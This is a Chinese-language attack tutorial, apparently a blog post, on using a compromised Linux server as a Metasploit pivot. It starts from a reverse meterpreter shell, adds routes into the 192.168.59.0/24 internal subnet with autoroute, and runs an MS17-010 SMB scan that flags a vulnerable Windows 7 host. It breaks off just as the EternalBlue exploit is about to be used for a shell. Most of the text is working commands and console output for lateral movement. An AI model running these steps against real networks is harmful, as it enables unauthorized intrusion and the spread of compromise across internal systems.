场景:攻击者拿下目标服务器发现目标服务器处于内网环境,内网中有其他服务器
目的:使用已经拿下的服务器作为网络跳板对处于目标内网的其他服务器进行攻击

使用工具:metasploit

首先局域网内的linux执行后门程序让处于外网的攻击机器收到shell

image

image

外网的攻击机器拿到shell之后:

使用get_local_subnets脚本获取肉鸡的网络信息

1
2
3
4
5
6
meterpreter > run get_local_subnets
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 172.17.0.0/255.255.0.0
Local subnet: 192.168.59.0/255.255.255.0

可见内网网段为192.168.59.0/24

然后使用autoroute模块添加路由

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
meterpreter > run autoroute -s 192.168.59.0/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.59.0/255.255.255.0...
[+] Added route to 192.168.59.0/255.255.255.0 via 125.65.72.15
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
192.168.59.0 255.255.255.0 Session 1

添加完成后返回上一层,这里一定要保证添加了路由规则的sessions的存活,如果sessions掉了对应的路由规则也就失效了

添加完成后使用ms17010的扫描脚本进行目标内网的扫描,可见ip为192.168.59.132的机器存在ms17010漏洞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
msf auxiliary(scanner/smb/smb_ms17_010) > set THREADS 10
THREADS => 10
msf auxiliary(scanner/smb/smb_ms17_010) > exploit
^C
[*] Caught interrupt from the console...
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.59.0/24
RHOSTS => 192.168.59.0/24
msf auxiliary(scanner/smb/smb_ms17_010) > exploit
[*] Scanned 27 of 256 hosts (10% complete)
[*] Scanned 52 of 256 hosts (20% complete)
[*] Scanned 80 of 256 hosts (31% complete)
[*] Scanned 103 of 256 hosts (40% complete)
[*] Scanned 128 of 256 hosts (50% complete)
[+] 192.168.59.132:445 - Host is likely VULNERABLE to MS17-010! (Windows 7 Ultimate 7600)
[*] Scanned 154 of 256 hosts (60% complete)
[*] Scanned 181 of 256 hosts (70% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 232 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/smb_ms17_010) >

使用漏洞利用脚本直接获取shell

[image


⬆︎TOP